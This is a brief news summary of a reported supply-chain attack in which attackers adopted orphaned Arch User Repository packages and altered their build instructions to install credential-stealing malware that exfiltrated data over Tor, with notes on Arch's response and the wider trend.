Attackers hijacked over 1,500 Arch Linux packages
2 days ago
- #Malware Campaign
- #Open Source Security
- #Supply Chain Attack
- Attackers hijacked over 1,500 packages in the Arch User Repository (AUR) by adopting orphaned packages and altering build instructions to install credential-stealing malware.
- The malware, dubbed 'Atomic Arch', targeted developers by stealing credentials like browser cookies, GitHub tokens, SSH keys, and more, using Tor to exfiltrate data.
- The attack exploited trust in package maintainers, not technical vulnerabilities, highlighting risks in open-source repositories with minimal vetting.
- Arch Linux temporarily froze new account registrations during cleanup, while its core distribution and official repos remained unaffected.
- Researchers note this tactic reflects a broader trend in 2026 of hijacking abandoned projects rather than creating new malicious ones, increasing supply-chain attack risks.
- The incident underscores the need for users to scrutinize build scripts and be wary of recently adopted packages, as structural issues in trust models persist.